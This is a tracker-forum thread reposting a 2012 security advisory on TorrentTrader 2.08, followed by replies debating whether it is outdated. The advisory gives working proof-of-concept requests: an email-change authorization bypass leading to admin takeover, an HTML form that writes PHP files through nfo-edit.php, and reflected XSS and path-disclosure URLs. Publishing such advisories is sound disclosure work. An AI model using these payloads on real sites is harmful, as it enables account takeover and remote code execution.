Bravo List
Register
Go Back   > Bravo List > Source Code > Active Trackers > Torrent Trader
Reply
  #1  
Old 23rd October 2021, 02:40
BamBam0077 BamBam0077 is offline
Banned
 
Join Date: Jul 2013
P2P
Posts: 410
Default [ViP] Multiple Vulnerabilities in TorrentTrader 2.08
waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08
================================================== =============================

Author: Janek Vind "waraxe"
Date: 17. September 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-89.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature packed and highly customisable PHP/MySQL Based BitTorrent
tracker. Featuring integrated forums, and plenty of administration options.

http://sourceforge.net/projects/torrenttrader/
http://www.torrenttrader.org/topic/1...v208-released/

################################################## #############################
1. Unauthorized Email Change in "account-ce.php"
################################################## #############################

Reason: authorization bypass
Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's

-----------------[ source code start ]---------------------------------
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
..
$res = SQL_Query_exec("SELECT `editsecret` FROM `users`
WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");

$row = mysql_fetch_assoc($res);
..
$sec = $row["editsecret"];

if ($md5 != md5($sec . $email . $sec))
show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);

SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)."
WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
-----------------[ source code end ]-----------------------------------

Tests:

Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452".
Target user ID is 1. We issue GET request:

http://localhost/torrenttrader208/account-ce.php?id=1&
secret=b642b4217b34b1e8d3bd915fc65c4452&email=test @test.com

Quick look to the database confirms, that email address of user with ID 1
has been changed indeed.

Next logical move for attacker is password recovery request:

http://localhost/torrenttrader208/account-recover.php

After admin account takeover attacker is able to use next vulnerability,
described below, which may allow php remote code execution.

################################################## #############################
2. Arbitrary file creation / directory traversal in "nfo-edit.php"
################################################## #############################

Reason: failure to properly sanitize user submitted data
Attack vector: user submitted POST parameters "id" and "content"
Preconditions:
1. nfo-file editing privileges needed (usually admin)
2. PHP must be < 5.3.4 for null-byte attacks to work
Result:
1. attacker is able to write remote files with arbitrary content
2. directory traversal vulnerability allows bypassing path restrictions


-----------------[ source code start ]---------------------------------
$id = (int)$_GET["id"]?$_GET["id"]:$_POST["id"];
$do = $_POST["do"];

$nfo = $site_config["nfo_dir"] . "/$id.nfo";

if ($do == "update") {
if (file_put_contents($nfo, $_POST["content"]))
{
write_log("NFO ($id) was updated by $CURUSER[username].");
-----------------[ source code end ]-----------------------------------

Test: first we need html form like the one below:

<html><body><center>
<form action="http://localhost/torrenttrader208/nfo-edit.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="do" value="update">
<input type="hidden" name="id" value="test.php">
<input type="hidden" name="content" value="<?php phpinfo();?>">
<input type="submit" value="Test">
</form></center></body></html>


Log in as admin and then make POST request by cliking "Test" button.
We should see "NFO Updated" as response and can confirm new file existence:

http://localhost/torrenttrader208/uploads/test.php.nfo

By using null byte ("\0") it's possible writing files with arbitrary extension.
Finally, it is possible to make use of directory traversal strings "../"
and write files to arbitrary location in remote server.

################################################## #############################
3. Username Enumeration Vulnerability in "account-login.php"
################################################## #############################

Reason: different error messages for invalid username and invalid password
Attack vector: user submitted POST parameters "username" and "password"
Preconditions: none
Result: attacker can enumerate valid usernames

-----------------[ source code start ]---------------------------------
if (!empty($_POST["username"]) && !empty($_POST["password"])) {
$res = SQL_Query_exec("SELECT id, password, secret, status, enabled FROM users
WHERE username = " . sqlesc($_POST["username"]) . "");
$row = mysql_fetch_array($res);

if (!$row)
$message = T_("USERNAME_INCORRECT");
elseif ($row["status"] == "pending")
$message = T_("ACCOUNT_PENDING");
elseif ($row["password"] != $password)
$message = T_("PASSWORD_INCORRECT");
-----------------[ source code end ]-----------------------------------

Tests:

Try to log in with nonexistent username:

"Username Incorrect"

Next, try valid username with incorrect password:

"Password Incorrect"

So it's obvious, that attacker is able to distinguish between valid and
invalid usernames and therefore username enumeration vulnerability exists.


################################################## #############################
4. Reflected XSS in "faq.php"
################################################## #############################
Preconditions: "register_globals=on"
Attack Vector: User provided parameter "faq_categ"

http://localhost/torrenttrader208/faq.php?faq_categ[0][title]=
<script>alert(String.fromCharCode(88,83,83))</script>&faq_categ[0][flag]=1
&faq_categ[0][items][0][question]=aa&faq_categ[0][items][0][answer]=bb
&faq_categ[0][items][0][flag]=1

http://localhost/torrenttrader208/faq.php?faq_categ[0][title]=test&faq_categ[0][flag]=1
&faq_categ[0][items][0][question]=<script>alert(String.fromCharCode(88,83,83))</script>
&faq_categ[0][items][0][answer]=bb&faq_categ[0][items][0][flag]=1

http://localhost/torrenttrader208/faq.php?faq_categ[0][title]=test&faq_categ[0][flag]=1
&faq_categ[0][items][0][question]=test&faq_categ[0][items][0][answer]=
<script>alert(String.fromCharCode(88,83,83))</script>&faq_categ[0][items][0][flag]=1


################################################## #############################
5. Reflected XSS in "account-signup.php"
################################################## #############################
Preconditions: "register_globals=on"
Attack Vector: User provided parameters "invite" and "secret"

http://localhost/torrenttrader208/ac...p?invite_row=1
&invite="><script>alert(String.fromCharCode(88,83, 83))</script>

http://localhost/torrenttrader208/ac...p?invite_row=1
&secret="><script>alert(String.fromCharCode(88,83, 83))</script>


################################################## #############################
6. Reflected XSS in "/themes/default/header.php"
################################################## #############################
Preconditions: "register_globals=on"
Attack Vector: User provided parameters "title" and "site_config"

http://localhost/torrenttrader208/th...lt/header.php?
title=</title><script>alert(String.fromCharCode(88,83,83)) </script>

http://localhost/torrenttrader208/th...lt/header.php?
site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83)) </script>

http://localhost/torrenttrader208/th...lt/header.php?
site_config[SITEURL]=--><script>alert(String.fromCharCode(88,83,83))</script>


################################################## #############################
7. Reflected XSS in "/themes/NB-Clean/header.php"
################################################## #############################
Preconditions: "register_globals=on"
Attack Vector: User provided parameters "title" and "site_config"

http://localhost/torrenttrader208/th...an/header.php?
title=</title><script>alert(String.fromCharCode(88,83,83)) </script>

http://localhost/torrenttrader208/th...an/header.php?
site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83)) </script>

http://localhost/torrenttrader208/th...an/header.php?
site_config[SITEURL]="><script>alert(String.fromCharCode(88,83,83)) </script>


################################################## #############################
8. Path Disclosure vulnerability in multiple scripts
################################################## #############################

http://localhost/torrenttrader208/ac...n.php?returnto[]

Warning: htmlspecialchars() expects parameter 1 to be string, array given in
C:/apache_www/torrenttrader208/account-login.php on line 72

http://localhost/torrenttrader208/th...ult/footer.php

Fatal error: Call to undefined function T_() in
C:/apache_www/torrenttrader208/themes/default/footer.php on line 26

http://localhost/torrenttrader208/th...ult/header.php

Fatal error: Call to undefined function T_() in
C:/apache_www/torrenttrader208/themes/default/header.php on line 28

http://localhost/torrenttrader208/th...ean/footer.php

Fatal error: Call to undefined function T_() in
C:/apache_www/torrenttrader208/themes/NB-Clean/footer.php on line 22

http://localhost/torrenttrader208/faq.php?faq_categ=1

Fatal error: Cannot use string offset as an array in
C:/apache_www/torrenttrader208/faq.php on line 17

http://localhost/torrenttrader208/rss.php?cat[]

Warning: explode() expects parameter 2 to be string, array given in
C:\apache_www\torrenttrader208\rss.php on line 119

http://localhost/torrenttrader208/ba...n=display&form[]

Warning: htmlspecialchars() expects parameter 1 to be string, array given in
C:\apache_www\torrenttrader208\backend\smilies.php on line 50


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------

Last edited by BamBam0077; 23rd October 2021 at 02:41. Reason: Credits > https://www.exploit-db.com/exploits/21396
Reply With Quote
  #2  
Old 23rd October 2021, 15:22
DND DND is offline
VIP
 
Join Date: Dec 2008
Posts: 1,241
Default
the DATE says 2012 !
you are again off your meds with all this non-sense posting
for Christ sake it even says of php 5.3 or lower.
__________________
Need HELP!? I can install:

  1. Server/VPS (Debian,CentOS,Ubuntu,Fedora, FreeBSD) Optimization and ... + Modules
  2. Webserver Windows/Linux (Apache/Lighttpd/Nginx/Mysql/PhpMyAdmin/SSL) Optimization and ... + Modules
  3. Seedbox Windows/Linux (uTorrent,rTorrent,libTorrent,ruTorrent) + Modules
  4. Multiple source code engines
  5. Linux Server Administration (security, cryptography/encryption, proxy, load balancer, custom ddos firewall)
Reply With Quote
The Following User Says Thank You to DND For This Useful Post:
BamBam0077 (24th October 2021)
  #3  
Old 28th February 2022, 23:15
Daz's Avatar
Daz Daz is offline
Senior Member
 
Join Date: Dec 2009
United Kingdom
Posts: 124
Default
It's true that it was in 2012, but who says that's fixed? Unless the versioning has been thrown out wrong then I'd think that the version here is vulnerable too. Who confirms that this version is not vulnerable to the said exploits?

The developers themselves or?
Reply With Quote
The Following User Says Thank You to Daz For This Useful Post:
BamBam0077 (2nd March 2022)
  #4  
Old 1st March 2022, 21:31
DND DND is offline
VIP
 
Join Date: Dec 2008
Posts: 1,241
Default
Because it doesnt matter who uses a piece of code(old or new) should know how to handle it. Especially if the code is 20 years old ! It's common sense to think about it as being outdated and unsecure and if no security patches were done you try and learn to do them yourself.
__________________
Need HELP!? I can install:

  1. Server/VPS (Debian,CentOS,Ubuntu,Fedora, FreeBSD) Optimization and ... + Modules
  2. Webserver Windows/Linux (Apache/Lighttpd/Nginx/Mysql/PhpMyAdmin/SSL) Optimization and ... + Modules
  3. Seedbox Windows/Linux (uTorrent,rTorrent,libTorrent,ruTorrent) + Modules
  4. Multiple source code engines
  5. Linux Server Administration (security, cryptography/encryption, proxy, load balancer, custom ddos firewall)
Reply With Quote
The Following User Says Thank You to DND For This Useful Post:
BamBam0077 (2nd March 2022)
  #5  
Old 2nd March 2022, 14:04
BamBam0077 BamBam0077 is offline
Banned
 
Join Date: Jul 2013
P2P
Posts: 410
Smile
Original Source
Attached Files
File Type: zip TorrentTrader-2.08-FINAL.zip (528.9 KB, 4 views)
File Type: zip AJAX-Chat-0.8.8-standalone.zip (618.5 KB, 7 views)
File Type: rar html2.rar (476.9 KB, 6 views)

Last edited by BamBam0077; 2nd March 2022 at 14:09. Reason: Added torrenttrader 3.0 #patch*okay
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump



All times are GMT +2. The time now is 14:12. vBulletin skin by ForumMonkeys. Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.